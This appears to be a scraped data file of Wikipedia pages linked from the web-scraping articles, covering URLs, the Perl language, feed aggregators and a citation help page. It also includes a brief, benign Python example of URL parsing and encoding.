180 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:All_articles_needing_additional_references | This category contains all pages labeled with Refimprove , Refimprovesect , One source and Unreferenced section and exists primarily for bot-based monitoring of articles which need additional sources. By-month categories are located in Category:Articles needing additional references. This category has the following 4 subcategories, out of 4 total. The following 200 pages are in this category, out of approximately 461,650 total. This list may not reflect recent changes. |
181 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/URL | A uniform resource locator (URL), colloquially known as an address on the Web, 1 is a reference to a resource that specifies its location on a computer network and a mechanism for retrieving it. A URL is a specific type of Uniform Resource Identifier (URI), 2 3 although many people use the two terms interchangeably. 4 a URLs occur most commonly to reference web pages (HTTP HTTPS) but are also used for file transfer (FTP), email (mailto), database access (JDBC), and many other applications. Most web browsers display the URL of a web page above the page in an address bar. A typical URL could have the form http: www.example.com index.html, which indicates a protocol (http), a hostname (www.example.com), and a file name (index.html). Uniform Resource Locators were defined in RFC 1738 in 1994 by Tim Berners-Lee, the inventor of the World Wide Web, and the URI working group of the Internet Engineering Task Force (IETF), 7 as an outcome of collaboration started at the IETF Living Documents birds of a feather session in 1992. 7 8 The format combines the pre-existing system of domain names (created in 1985) with file path syntax, where slashes are used to separate directory and filenames. Conventions already existed where server names could be prefixed to complete file paths, preceded by a double slash ( ). 9 Berners-Lee later expressed regret at the use of dots to separate the parts of the domain name within URIs, wishing he had used slashes throughout, 9 and also said that, given the colon following the first component of a URI, the two slashes before the domain name were unnecessary. 10 Early WorldWideWeb collaborators including Berners-Lee originally proposed the use of UDIs: Universal Document Identifiers. An early (1993) draft of the HTML Specification 11 referred to "Universal" Resource Locators. This was dropped some time between June 1994 (RFC 1630) and October 1994 (draft-ietf-uri-url 08.txt). 12 In his book Weaving the Web, Berners-Lee emphasizes his preference for the original inclusion of "universal" in the expansion rather than the word "uniform", to which it was later changed, and he gives a brief account of the contention that led to the change. Every HTTP URL conforms to the syntax of a generic URI. The URI generic syntax consists of five components organized hierarchically in order of decreasing significance from left to right: 13 : 3 A component is undefined if it has an associated delimiter and the delimiter does not appear in the URI; the scheme and path components are always defined. 13 : 5.2.1 A component is empty if it has no characters; the scheme component is always non-empty. 13 : 3 The authority component consists of subcomponents: This is represented in a syntax diagram as: The URI comprises: A web browser will usually dereference a URL by performing an HTTP request to the specified host, by default on port number 80. URLs using the https scheme require that requests and responses be made over a secure connection to the website. Internet users are distributed throughout the world using a wide variety of languages and alphabets, and expect to be able to create URLs in their own local alphabets. An Internationalized Resource Identifier (IRI) is a form of URL that includes Unicode characters. All modern browsers support IRIs. The parts of the URL requiring special treatment for different alphabets are the domain name and path. 
18 19 The domain name in the IRI is known as an Internationalized Domain Name (IDN). Web and Internet software automatically convert the domain name into punycode usable by the Domain Name System; for example, the Chinese URL http: . becomes http: xn fsqu00a.xn 3lr804guic . The xn indicates that the character was not originally ASCII. 20 The URL path name can also be specified by the user in the local writing system. If not already encoded, it is converted to UTF 8, and any characters not part of the basic URL character set are escaped as hexadecimal using percent-encoding; for example, the Japanese URL http: example.com .html becomes http: example.com E5%BC 95%E3%81%8D E5%89%B2%E3%82%8A.html. The target computer decodes the address and displays the page. 18 Protocol-relative links (PRL), also known as protocol-relative URLs (PRURL), are URLs that have no protocol specified. For example, example.com will use the protocol of the current page, typically HTTP or HTTPS. 21 22 |
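The URL entry above covers the generic URI components, punycode for internationalized domain names, and percent-encoding of non-ASCII paths, all of which come up when cleaning scraped links. A short sketch of how Python’s standard library handles each piece; the hostnames and paths below are arbitrary placeholders.

from urllib.parse import urlsplit, quote, urljoin

# Split a URL into the generic URI components described above.
parts = urlsplit("https://www.example.com/index.html?q=scraping#top")
print(parts.scheme, parts.netloc, parts.path, parts.query, parts.fragment)
# https www.example.com /index.html q=scraping top

# Percent-encode a non-ASCII path segment as UTF-8 (placeholder path).
print(quote("引き割り.html"))
# %E5%BC%95%E3%81%8D%E5%89%B2%E3%82%8A.html

# Convert an internationalized domain name to its punycode (xn--) form.
print("bücher.example".encode("idna").decode("ascii"))
# xn--bcher-kva.example

# Resolve a relative link against a base page, as a crawler would.
print(urljoin("https://www.example.com/docs/index.html", "../about.html"))
# https://www.example.com/about.html

urljoin in particular is what a crawler uses to turn the relative links found in a page into absolute URLs before requesting them.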
182 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Perl | Perl is a high-level, general-purpose, interpreted, dynamic programming language. Though Perl is not officially an acronym, 9 there are various backronyms in use, including "Practical Extraction and Reporting Language". 10 Perl was developed by Larry Wall in 1987 11 as a general-purpose Unix scripting language to make report processing easier. 12 11 13 Since then, it has undergone many changes and revisions. Perl originally was not capitalized and the name was changed to being capitalized by the time Perl 4 was released. 13 The latest release is Perl 5, first released in 1994. From 2000 to October 2019 a sixth version of Perl was in development; the sixth version's name was changed to Raku. 14 15 Both languages continue to be developed independently by different development teams which liberally borrow ideas from each other. Perl borrows features from other programming languages including C, sh, AWK, and sed. 1 It provides text processing facilities without the arbitrary data-length limits of many contemporary Unix command line tools. 16 Perl is a highly expressive programming language: source code for a given algorithm can be short and highly compressible. 17 18 Perl gained widespread popularity in the mid 1990s as a CGI scripting language, in part due to its powerful regular expression and string parsing abilities. 19 20 21 22 In addition to CGI, Perl 5 is used for system administration, network programming, finance, bioinformatics, and other applications, such as for graphical user interfaces (GUIs). It has been nicknamed "the Swiss Army chainsaw of scripting languages" because of its flexibility and power. 23 In 1998, it was also referred to as the "duct tape that holds the Internet together", in reference to both its ubiquitous use as a glue language and its perceived inelegance. 24 Perl was originally named "Pearl". Wall wanted to give the language a short name with positive connotations. It is also a Christian reference to the Parable of the Pearl from the Gospel of Matthew. 11 25 However, Wall discovered the existing PEARL language before Perl's official release and changed the spelling of the name and dropped the "a" from the name. 26 11 The name is occasionally expanded as a backronym: Practical Extraction and Report Language 27 and Wall's own Pathologically Eclectic Rubbish Lister, which is in the manual page for perl. 28 Programming Perl, published by O'Reilly Media, features a picture of a dromedary camel on the cover and is commonly called the "Camel Book". 29 This image has become an unofficial symbol of Perl. O'Reilly owns the image as a trademark but licenses it for non-commercial use, requiring only an acknowledgement and a link to www.perl.com. Licensing for commercial use is decided on a case-by-case basis. 30 O'Reilly also provides "Programming Republic of Perl" logos for non-commercial sites and "Powered by Perl" buttons for any site that uses Perl. 30 The Perl Foundation owns an alternative symbol, an onion, which it licenses to its subsidiaries, Perl Mongers, PerlMonks, Perl.org, and others. 31 The symbol is a visual pun on pearl onion. 32 Larry Wall began work on Perl in 1987, while employed as a programmer at Unisys; 16 he released version 1.0 on December 18, 1987. 1 11 Wall based early Perl on some methods existing languages used for text manipulation. 11 Perl 2, released in June 1988, 33 34 featured a better regular expression engine. 
Perl 3, released in October 1989, 33 added support for binary data streams. 35 Originally, the only documentation for Perl was a single lengthy man page. In 1991, Programming Perl, known to many Perl programmers as the "Camel Book" because of its cover, was published and became the de facto reference for the language. 36 At the same time, the Perl version number was bumped to 4, not to mark a major change in the language but to identify the version that was well documented by the book. 37 Perl 4 was released in March 1991. 33 Perl 4 went through a series of maintenance releases, culminating in Perl 4.036 in 1993, whereupon Wall abandoned Perl 4 to begin work on Perl 5. Initial design of Perl 5 continued into 1994. The perl5 porters mailing list was established in May 1994 to coordinate work on porting Perl 5 to different platforms. It remains the primary forum for development, maintenance, and porting of Perl 5. 38 Perl 5.000 was released on October 17, 1994. 39 It was a nearly complete rewrite of the interpreter, and it added many new features to the language, including objects, references, lexical (my) variables, and modules. Importantly, modules provided a mechanism for extending the language without modifying the interpreter. This allowed the core interpreter to stabilize, even as it enabled ordinary Perl programmers to add new language features. Perl 5 has been in active development since then. Perl 5.001 was released on March 13, 1995. Perl 5.002 was released on February 29, 1996 with the new prototypes feature. This allowed module authors to make subroutines that behaved like Perl builtins. Perl 5.003 was released June 25, 1996, as a security release. 40 One of the most important events in Perl 5 history took place outside of the language proper and was a consequence of its module support. On October 26, 1995, the Comprehensive Perl Archive Network (CPAN) was established as a repository for the Perl language and Perl modules; as of December 2022 update , it carries over 211,850 modules in 43,865 distributions, written by more than 14,324 authors, and is mirrored worldwide at more than 245 locations. 41 Perl 5.004 was released on May 15, 1997, and included, among other things, the UNIVERSAL package, giving Perl a base object from which all classes were automatically derived and the ability to require versions of modules. Another significant development was the inclusion of the CGI.pm module, 42 which contributed to Perl's popularity as a CGI scripting language. 43 Perl 5.004 added support for Microsoft Windows, Plan 9, QNX, and AmigaOS. 42 Perl 5.005 was released on July 22, 1998. This release included several enhancements to the regex engine, new hooks into the backend through the B:: modules, the qr regex quote operator, a large selection of other new core modules, and added support for several more operating systems, including BeOS. 44 Perl 5.6 was released on March 22, 2000. Major changes included 64 bit support, Unicode string representation, support for files over 2 GiB, and the "our" keyword. 46 47 When developing Perl 5.6, the decision was made to switch the versioning scheme to one more similar to other open source projects; after 5.005 63, the next version became 5.5.640, with plans for development versions to have odd numbers and stable versions to have even numbers. 48 In 2000, Wall put forth a call for suggestions for a new version of Perl from the community. 
The process resulted in 361 RFC (Request for Comments) documents that were to be used in guiding development of Perl 6. In 2001, 49 work began on the "Apocalypses" for Perl 6, a series of documents meant to summarize the change requests and present the design of the next generation of Perl. They were presented as a digest of the RFCs, rather than a formal document. At this time, Perl 6 existed only as a description of a language. citation needed Perl 5.8 was first released on July 18, 2002, and further 5.X versions have been released approximately yearly since then. Perl 5.8 improved Unicode support, added a new I O implementation, added a new thread implementation, improved numeric accuracy, and added several new modules. 50 As of 2013, this version was still the most popular Perl version and was used by Red Hat Linux 5, SUSE Linux 10, Solaris 10, HP-UX 11.31, and AIX 5. In 2004, work began on the "Synopses" documents that originally summarized the Apocalypses, but which became the specification for the Perl 6 language. In February 2005, Audrey Tang began work on Pugs, a Perl 6 interpreter written in Haskell. 51 This was the first concerted effort toward making Perl 6 a reality. This effort stalled in 2006. 52 The Perl On New Internal Engine (PONIE) project existed from 2003 until 2006. It was to be a bridge between Perl 5 and 6, and an effort to rewrite the Perl 5 interpreter to run on the Perl 6 Parrot virtual machine. The goal was to ensure the future of the millions of lines of Perl 5 code at thousands of companies around the world. 53 The PONIE project ended in 2006 and is no longer being actively developed. Some of the improvements made to the Perl 5 interpreter as part of PONIE were folded into that project. 54 On December 18, 2007, the 20th anniversary of Perl 1.0, Perl 5.10.0 was released. Perl 5.10.0 included notable new features, which brought it closer to Perl 6. These included a switch statement (called "given" "when"), regular expressions updates, and the smart match operator ( ). 55 56 Around this same time, development began in earnest on another implementation of Perl 6 known as Rakudo Perl, developed in tandem with the Parrot virtual machine. As of November 2009, Rakudo Perl has had regular monthly releases and now is the most complete implementation of Perl 6. A major change in the development process of Perl 5 occurred with Perl 5.11; the development community has switched to a monthly release cycle of development releases, with a yearly schedule of stable releases. By that plan, bugfix point releases will follow the stable releases every three months. citation needed On April 12, 2010, Perl 5.12.0 was released. Notable core enhancements include new package NAME VERSION syntax, the yada yada operator (intended to mark placeholder code that is not yet implemented), implicit strictures, full Y2038 compliance, regex conversion overloading, DTrace support, and Unicode 5.2. 57 On May 14, 2011, Perl 5.14 was released with JSON support built-in. 58 On May 20, 2012, Perl 5.16 was released. Notable new features include the ability to specify a given version of Perl that one wishes to emulate, allowing users to upgrade their version of Perl, but still run old scripts that would normally be incompatible. 59 failed verification Perl 5.16 also updates the core to support Unicode 6.1. 59 On May 18, 2013, Perl 5.18 was released. Notable new features include the new dtrace hooks, lexical subs, more CORE:: subs, overhaul of the hash for security reasons, support for Unicode 6.2. 
60 On May 27, 2014, Perl 5.20 was released. Notable new features include subroutine signatures, hash slices new slice syntax, postfix dereferencing (experimental), Unicode 6.3, and a rand() function using a consistent random number generator. 61 Some observers credit the release of Perl 5.10 with the start of the Modern Perl movement. 62 In particular, this phrase describes a style of development that embraces the use of the CPAN, takes advantage of recent developments in the language, and is rigorous about creating high quality code. 63 While the book Modern Perl 64 may be the most visible standard-bearer of this idea, other groups such as the Enlightened Perl Organization 65 have taken up the cause. In late 2012 and 2013, several projects for alternative implementations for Perl 5 started: Perl5 in Perl6 by the Rakudo Perl team, 66 moe by Stevan Little and friends, 67 p2 68 by the Perl11 team under Reini Urban, gperl by goccy, 69 and rperl, a Kickstarter project led by Will Braswell and affiliated with the Perl11 project. 70 At the 2000 Perl Conference, Jon Orwant made a case for a major new language initiative. 72 This led to a decision to begin work on a redesign of the language, to be called Perl 6. Proposals for new language features were solicited from the Perl community at large, which submitted more than 300 RFCs. 73 Wall spent the next few years digesting the RFCs and synthesizing them into a coherent framework for Perl 6. He presented his design for Perl 6 in a series of documents called "apocalypses" numbered to correspond to chapters in Programming Perl. As of January 2011 update , the developing specification of Perl 6 was encapsulated in design documents called Synopses numbered to correspond to Apocalypses. 74 Thesis work by Bradley M. Kuhn, overseen by Wall, considered the possible use of the Java virtual machine as a runtime for Perl. 75 Kuhn's thesis showed this approach to be problematic. In 2001, it was decided that Perl 6 would run on a cross-language virtual machine called Parrot. In 2005, Audrey Tang created the Pugs project, an implementation of Perl 6 in Haskell. This acted as, and continues to act as, a test platform for the Perl 6 language (separate from the development of the actual implementation), allowing the language designers to explore. The Pugs project spawned an active Perl Haskell cross-language community centered around the Libera Chat raku IRC channel. Many functional programming influences were absorbed by the Perl 6 design team. 76 In 2012, Perl 6 development was centered primarily on two compilers: 77 In 2013, MoarVM ("Metamodel On A Runtime"), a C language-based virtual machine designed primarily for Rakudo was announced. 79 In October 2019, Perl 6 was renamed to Raku. 80 As of 2017 update only the Rakudo implementation and MoarVM are under active development, and other virtual machines, such as the Java Virtual Machine and JavaScript, are supported. 81 In June 2020, Perl 7 was announced as the successor to Perl 5. 82 Perl 7 was to initially be based on Perl 5.32 with a release expected in first half of 2021, and release candidates sooner. 83 This plan was revised in May 2021, without any release timeframe or version of Perl 5 for use as a baseline specified. 84 When Perl 7 would be released, Perl 5 would have gone into long term maintenance. Supported Perl 5 versions however would continue to get important security and bug fixes. 85 Perl 7 was announced on 24 June 2020 at "The Perl Conference in the Cloud" as the successor to Perl 5. 
83 82 Based on Perl 5.32, Perl 7 was planned to be backward compatible with modern Perl 5 code; Perl 5 code, without boilerplate (pragma) header needs adding use compat::perl5; to stay compatible, but modern code can drop some of the boilerplate. The plan to go to Perl 7 brought up more discussion, however, and the Perl Steering Committee canceled it to avoid issues with backward compatibility for scripts that were not written to the pragmas and modules that would become the default in Perl 7. Perl 7 will only come out when the developers add enough features to warrant a major release upgrade. 86 According to Wall, Perl has two slogans. The first is "There's more than one way to do it, commonly known as TMTOWTDI, (pronounced Tim Toady). As proponents of this motto argue, this philosophy makes it easy to write concise statements. 87 88 89 The second slogan is "Easy things should be easy and hard things should be possible". 16 The design of Perl can be understood as a response to three broad trends in the computer industry: falling hardware costs, rising labor costs, and improvements in compiler technology. Many earlier computer languages, such as Fortran and C, aimed to make efficient use of expensive computer hardware. In contrast, Perl was designed so that computer programmers could write programs more quickly and easily. 90 Perl has many features that ease the task of the programmer at the expense of greater CPU and memory requirements. These include automatic memory management; dynamic typing; strings, lists, and hashes; regular expressions; introspection; and an eval() function. Perl follows the theory of "no built-in limits", 29 an idea similar to the Zero One Infinity rule. Wall was trained as a linguist, and the design of Perl is very much informed by linguistic principles. Examples include Huffman coding (common constructions should be short), good end-weighting (the important information should come first), and a large collection of language primitives. Perl favors language constructs that are concise and natural for humans to write, even where they complicate the Perl interpreter. 91 Perl's syntax reflects the idea that "things that are different should look different. 92 For example, scalars, arrays, and hashes have different leading sigils. Array indices and hash keys use different kinds of braces. Strings and regular expressions have different standard delimiters. There is a broad practical bent to both the Perl language and the community and culture that surround it. The preface to Programming Perl begins: "Perl is a language for getting your job done. 16 One consequence of this is that Perl is not a tidy language. It includes many features, tolerates exceptions to its rules, and employs heuristics to resolve syntactical ambiguities. Because of the forgiving nature of the compiler, bugs can sometimes be hard to find. Perl's function documentation remarks on the variant behavior of built-in functions in list and scalar contexts by saying, "In general, they do what you want, unless you want consistency. 93 The overall structure of Perl derives broadly from C. Perl is procedural in nature, with variables, expressions, assignment statements, brace-delimited blocks, control structures, and subroutines. 94 Perl also takes features from shell programming. All variables are marked with leading sigils, which allow variables to be interpolated directly into strings. 
However, unlike the shell, Perl uses sigils on all accesses to variables, and unlike most other programming languages that use sigils, the sigil doesn't denote the type of the variable but the type of the expression. So for example, while an array is denoted by the sigil @ (for example @arrayname), an individual member of the array is denoted by the scalar sigil $ (for example $arrayname[3]). Perl also has many built-in functions that provide tools often used in shell programming (although many of these tools are implemented by programs external to the shell) such as sorting, and calling operating system facilities. citation needed Perl takes hashes ("associative arrays") from AWK and regular expressions from sed. These simplify many parsing, text-handling, and data-management tasks. Shared with Lisp is the implicit return of the last value in a block, and all statements are also expressions which can be used in larger expressions themselves. citation needed Perl 5 added features that support complex data structures, first-class functions (that is, closures as values), and an object-oriented programming model. These include references, packages, class-based method dispatch, and lexically scoped variables, along with compiler directives (for example, the strict pragma). A major additional feature introduced with Perl 5 was the ability to package code as reusable modules. Wall later stated that "The whole intent of Perl 5's module system was to encourage the growth of Perl culture rather than the Perl core." 95 All versions of Perl do automatic data-typing and automatic memory management. The interpreter knows the type and storage requirements of every data object in the program; it allocates and frees storage for them as necessary using reference counting (so it cannot deallocate circular data structures without manual intervention). Legal type conversions (for example, conversions from number to string) are done automatically at run time; illegal type conversions are fatal errors. citation needed Perl has been referred to as "line noise" and a "write-only language" by its critics. Randal L. Schwartz, in the first chapter of the first edition of the book Learning Perl, 96 states: "Yes, sometimes Perl looks like line noise to the uninitiated, but to the seasoned Perl programmer, it looks like checksummed line noise with a mission in life." 97 He also stated that the accusation that Perl is a write-only language could be avoided by coding with "proper care". 97 The Perl overview document perlintro states that the names of built-in "magic" scalar variables "look like punctuation or line noise". 98 However, the English module provides both long and short English alternatives. The perlstyle document states that line noise in regular expressions could be mitigated using the /x modifier to add whitespace. 99 According to the Perl 6 FAQ, Perl 6 was designed to mitigate "the usual suspects" that elicit the "line noise" claim from Perl 5 critics, including the removal of "the majority of the punctuation variables" and the sanitization of the regex syntax. 100 The Perl 6 FAQ also states that what is sometimes referred to as Perl's line noise is "the actual syntax of the language", just as gerunds and prepositions are a part of the English language.
100 In a December 2012 blog posting, despite claiming that "Rakudo Perl 6 has failed and will continue to fail unless it gets some adult supervision", chromatic stated that the design of Perl 6 has a "well-defined grammar", an "improved type system, a unified object system with an intelligent metamodel, metaoperators, and a clearer system of context that provides for such niceties as pervasive laziness". 101 He also stated that "Perl 6 has a coherence and a consistency that Perl 5 lacks. 101 In Perl, one could write the "Hello, World program as: Here is a more complex Perl program, that counts down seconds from a given starting value: The Perl interpreter can also be used for one-off scripts on the command line. The following example (as invoked from an sh-compatible shell, such as Bash) translates the string "Bob" in all files ending with .txt in the current directory to "Robert": No written specification or standard for the Perl language exists for Perl versions through Perl 5, and there are no plans to create one for the current version of Perl. There has been only one implementation of the interpreter, and the language has evolved along with it. That interpreter, together with its functional tests, stands as a de facto specification of the language. Perl 6, however, started with a specification, 102 and several projects 103 aim to implement some or all of the specification. citation needed Perl is implemented as a core interpreter, written in C, together with a large collection of modules, written in Perl and C. As of 2010 update , the interpreter is 150,000 lines of C code and compiles to a 1 MB executable on typical machine architectures. Alternatively, the interpreter can be compiled to a link library and embedded in other programs. There are nearly 500 modules in the distribution, comprising 200,000 lines of Perl and an additional 350,000 lines of C code (much of the C code in the modules consists of character encoding tables). citation needed The interpreter has an object-oriented architecture. All of the elements of the Perl language—scalars, arrays, hashes, coderefs, file handles—are represented in the interpreter by C structs. Operations on these structs are defined by a large collection of macros, typedefs, and functions; these constitute the Perl C API. The Perl API can be bewildering to the uninitiated, but its entry points follow a consistent naming scheme, which provides guidance to those who use it. citation needed The life of a Perl interpreter divides broadly into a compile phase and a run phase. 104 In Perl, the phases are the major stages in the interpreter's life-cycle. Each interpreter goes through each phase only once, and the phases follow in a fixed sequence. citation needed Most of what happens in Perl's compile phase is compilation, and most of what happens in Perl's run phase is execution, but there are significant exceptions. Perl makes important use of its capability to execute Perl code during the compile phase. Perl will also delay compilation into the run phase. The terms that indicate the kind of processing that is actually occurring at any moment are compile time and run time. Perl is in compile time at most points during the compile phase, but compile time may also be entered during the run phase. The compile time for code in a string argument passed to the eval built-in occurs during the run phase. Perl is often in run time during the compile phase and spends most of the run phase in run time. 
Code in BEGIN blocks executes at run time but in the compile phase. At compile time, the interpreter parses Perl code into a syntax tree. At run time, it executes the program by walking the tree. Text is parsed only once, and the syntax tree is subject to optimization before it is executed, so that execution is relatively efficient. Compile-time optimizations on the syntax tree include constant folding and context propagation, but peephole optimization is also performed. 105 Perl has a Turing-complete grammar because parsing can be affected by run-time code executed during the compile phase. 106 Therefore, Perl cannot be parsed by a straight Lex Yacc lexer parser combination. Instead, the interpreter implements its own lexer, which coordinates with a modified GNU bison parser to resolve ambiguities in the language. citation needed It is often said that "Only perl can parse Perl", 107 meaning that only the Perl interpreter (perl) can parse the Perl language (Perl), but even this is not, in general, true. Because the Perl interpreter can simulate a Turing machine during its compile phase, it would need to decide the halting problem in order to complete parsing in every case. It is a longstanding result that the halting problem is undecidable, and therefore not even Perl can always parse Perl. Perl makes the unusual choice of giving the user access to its full programming power in its own compile phase. The cost in terms of theoretical purity is high, but practical inconvenience seems to be rare. 108 Other programs that undertake to parse Perl, such as source-code analyzers and auto-indenters, have to contend not only with ambiguous syntactic constructs but also with the undecidability of Perl parsing in the general case. Adam Kennedy's PPI project focused on parsing Perl code as a document (retaining its integrity as a document), instead of parsing Perl as executable code (that not even Perl itself can always do). It was Kennedy who first conjectured that "parsing Perl suffers from the 'halting problem', 109 which was later proved. 110 Perl is distributed with over 250,000 functional tests for core Perl language and over 250,000 functional tests for core modules. These run as part of the normal build process and extensively exercise the interpreter and its core modules. Perl developers rely on the functional tests to ensure that changes to the interpreter do not introduce software bugs; further, Perl users who see that the interpreter passes its functional tests on their system can have a high degree of confidence that it is working properly. citation needed Perl is dual licensed under both the Artistic License 1.0 5 6 and the GNU General Public License. 7 Distributions are available for most operating systems. It is particularly prevalent on Unix and Unix-like systems, but it has been ported to most modern (and many obsolete) platforms. With only six citation needed reported exceptions, Perl can be compiled from source code on all POSIX-compliant, or otherwise-Unix-compatible, platforms. 111 Because of unusual changes required for the classic Mac OS environment, a special port called MacPerl was shipped independently. 112 The Comprehensive Perl Archive Network carries a complete list of supported platforms with links to the distributions available on each. 113 CPAN is also the source for publicly available Perl modules that are not part of the core Perl distribution. 
citation needed ActivePerl is a closed-source distribution from ActiveState that has regular releases that track the core Perl releases. 114 The distribution previously included the Perl package manager (PPM), 115 a popular tool for installing, removing, upgrading, and managing the use of common Perl modules; however, this tool was discontinued as of ActivePerl 5.28. 116 Included also is PerlScript, a Windows Script Host (WSH) engine implementing the Perl language. Visual Perl is an ActiveState tool that adds Perl to the Visual Studio .NET development suite. A VBScript-to-Perl converter, a Perl compiler for Windows, and converters of AWK and sed to Perl have also been produced by this company and included on the ActiveState CD for Windows, which includes all of their distributions plus the Komodo IDE and all but the first on the Unix Linux POSIX variant thereof in 2002 and afterward. 117 The Computer Language Benchmarks Game compares the performance of implementations of typical programming problems in several programming languages. 118 The submitted Perl implementations typically perform toward the high end of the memory-usage spectrum and give varied speed results. Perl's performance in the benchmarks game is typical for interpreted languages. 119 Large Perl programs start more slowly than similar programs in compiled languages because Perl has to compile the source every time it runs. In a talk at the YAPC::Europe 2005 conference and subsequent article "A Timely Start", Jean-Louis Leroy found that his Perl programs took much longer to run than expected because the perl interpreter spent significant time finding modules within his over-large include path. 120 Unlike Java, Python, and Ruby, Perl has only experimental support for pre-compiling. 121 Therefore, Perl programs pay this overhead penalty on every execution. The run phase of typical programs is long enough that amortized startup time is not substantial, but benchmarks that measure very short execution times are likely to be skewed due to this overhead. 122 A number of tools have been introduced to improve this situation. The first such tool was Apache's mod perl, which sought to address one of the most-common reasons that small Perl programs were invoked rapidly: CGI Web development. ActivePerl, via Microsoft ISAPI, provides similar performance improvements. 123 Once Perl code is compiled, there is additional overhead during the execution phase that typically isn't present for programs written in compiled languages such as C or C . Examples of such overhead include bytecode interpretation, reference-counting memory management, and dynamic type-checking. 124 The most critical routines can be written in other languages (such as C), which can be connected to Perl via simple Inline modules or the more complex, but flexible, XS mechanism. 125 Perl has many and varied applications, compounded by the availability of many standard and third-party modules. Perl has chiefly been used to write CGI scripts: large projects written in Perl include cPanel, Slash, Bugzilla, RT, TWiki, and Movable Type; high-traffic websites that use Perl extensively include Priceline.com, Craigslist, 126 IMDb, 127 LiveJournal, DuckDuckGo, 128 129 Slashdot and Ticketmaster. It is also an optional component of the popular LAMP technology stack for Web development, in lieu of PHP or Python. Perl is used extensively as a system programming language in the Debian Linux distribution. 
130 Perl is often used as a glue language, tying together systems and interfaces that were not specifically designed to interoperate, and for "data munging", 131 that is, converting or processing large amounts of data for tasks such as creating reports. These strengths are linked intimately. The combination makes Perl a popular all-purpose language for system administrators, particularly because short programs, often called "one-liner programs", can be entered and run on a single command line. citation needed Perl code can be made portable across Windows and Unix; such code is often used by suppliers of software (both commercial off-the-shelf (COTS) and bespoke) to simplify packaging and maintenance of software build- and deployment-scripts. citation needed Perl Tk and wxPerl are commonly used to add graphical user interfaces to Perl scripts. Perl's text-handling capabilities can be used for generating SQL queries; arrays, hashes, and automatic memory management make it easy to collect and process the returned data. For example, in Tim Bunce's Perl DBI application programming interface (API), the arguments to the API can be the text of SQL queries; thus it is possible to program in multiple languages at the same time (e.g., for generating a Web page using HTML, JavaScript, and SQL in a here document). The use of Perl variable interpolation to programmatically customize each of the SQL queries, and the specification of Perl arrays or hashes as the structures to programmatically hold the resulting data sets from each SQL query, allows a high-level mechanism for handling large amounts of data for post-processing by a Perl subprogram. 132 In early versions of Perl, database interfaces were created by relinking the interpreter with a client-side database library. This was sufficiently difficult that it was done for only a few of the most-important and most widely used databases, and it restricted the resulting perl executable to using just one database interface at a time. 133 In Perl 5, database interfaces are implemented by Perl DBI modules. The DBI (Database Interface) module presents a single, database-independent interface to Perl applications, while the DBD (Database Driver) modules handle the details of accessing some 50 different databases; there are DBD drivers for most ANSI SQL databases. 134 DBI provides caching for database handles and queries, which can greatly improve performance in long-lived execution environments such as mod perl, 135 helping high-volume systems avert load spikes as in the Slashdot effect. 136 In modern Perl applications, especially those written using web frameworks such as Catalyst, the DBI module is often used indirectly via object-relational mappers such as DBIx::Class, Class::DBI 137 or Rose::DB::Object 138 that generate SQL queries and handle data transparently to the application author. 139 Perl's culture and community has developed alongside the language itself. Usenet was the first public venue in which Perl was introduced, but over the course of its evolution, Perl's community was shaped by the growth of broadening Internet-based services including the introduction of the World Wide Web. The community that surrounds Perl was, in fact, the topic of Wall's first "State of the Onion" talk. 140 State of the Onion is the name for Wall's yearly keynote-style summaries on the progress of Perl and its community. 
They are characterized by his hallmark humor, employing references to Perl's culture, the wider hacker culture, Wall's linguistic background, sometimes his family life, and occasionally even his Christian background. 141 Each talk is first given at various Perl conferences and is eventually also published online. In email, Usenet, and message board postings, "Just another Perl hacker" (JAPH) programs are a common trend, originated by Randal L. Schwartz, one of the earliest professional Perl trainers. 142 In the parlance of Perl culture, Perl programmers are known as Perl hackers, and from this derives the practice of writing short programs to print out the phrase "Just another Perl hacker". In the spirit of the original concept, these programs are moderately obfuscated and short enough to fit into the signature of an email or Usenet message. The "canonical" JAPH as developed by Schwartz includes the comma at the end, although this is often omitted. 143 Perl "golf" is the pastime of reducing the number of characters (key "strokes") used in a Perl program to the bare minimum, much in the same way that golf players seek to take as few shots as possible in a round. The phrase's first use 144 emphasized the difference between pedestrian code meant to teach a newcomer and terse hacks likely to amuse experienced Perl programmers, an example of the latter being JAPHs that were already used in signatures in Usenet postings and elsewhere. Similar stunts had been an unnamed pastime in the language APL in previous decades. The use of Perl to write a program that performed RSA encryption prompted a widespread and practical interest in this pastime. 145 In subsequent years, the term "code golf" has been applied to the pastime in other languages. 146 A Perl Golf Apocalypse was held at Perl Conference 4.0 in Monterey, California in July 2000. As with C, obfuscated code competitions were a well known pastime in the late 1990s. The Obfuscated Perl Contest was a competition held by The Perl Journal from 1996 to 2000 that made an arch virtue of Perl's syntactic flexibility. Awards were given for categories such as "most powerful"—programs that made efficient use of space—and "best four-line signature" for programs that fit into four lines of 76 characters in the style of a Usenet signature block. 147 Perl poetry is the practice of writing poems that can be compiled as legal Perl code, for example the piece known as "Black Perl". Perl poetry is made possible by the large number of English words that are used in the Perl language. New poems are regularly submitted to the community at PerlMonks. 148 |
183 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Comparison_of_feed_aggregators | The following is a comparison of RSS feed aggregators. Often e-mail programs and web browsers have the ability to display RSS feeds. They are listed here, too. Many BitTorrent clients support RSS feeds for broadcasting (see Comparison of BitTorrent clients). With the rise of cloud computing, some cloud-based services offer feed aggregation. They are listed here as well. Netscape Messenger 9 is a fork of Mozilla Thunderbird and has the same features. Web browsers and Internet suites are marked N/A for browser plug-in support because they do not need one. |
184 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Referencing_for_beginners | One of the key policies of Wikipedia is that all article content has to be verifiable. This means that reliable sources must be able to support the material. All quotations, any material whose verifiability has been challenged or is likely to be challenged, and contentious material (whether negative, positive, or neutral) about living persons must include an inline citation to a source that directly supports the material. This also means that Wikipedia is not the place for original work, archival findings that have not been published, or evidence from any source that has not been published. If you are adding new content, it is your responsibility to add sourcing information along with it. Material provided without a source is significantly more likely to be removed from an article. Sometimes it will be tagged first with a "citation needed" template to give editors a chance to find and add sources, but some editors will simply remove it because they question its veracity. This tutorial will show you how to add inline citations to articles, and also briefly explain what Wikipedia considers to be a reliable source. Inline citations are usually small, numbered footnotes like this. 1 They are generally added either directly following the fact that they support, or at the end of the sentence that they support, following any punctuation. When clicked, they take the reader to a 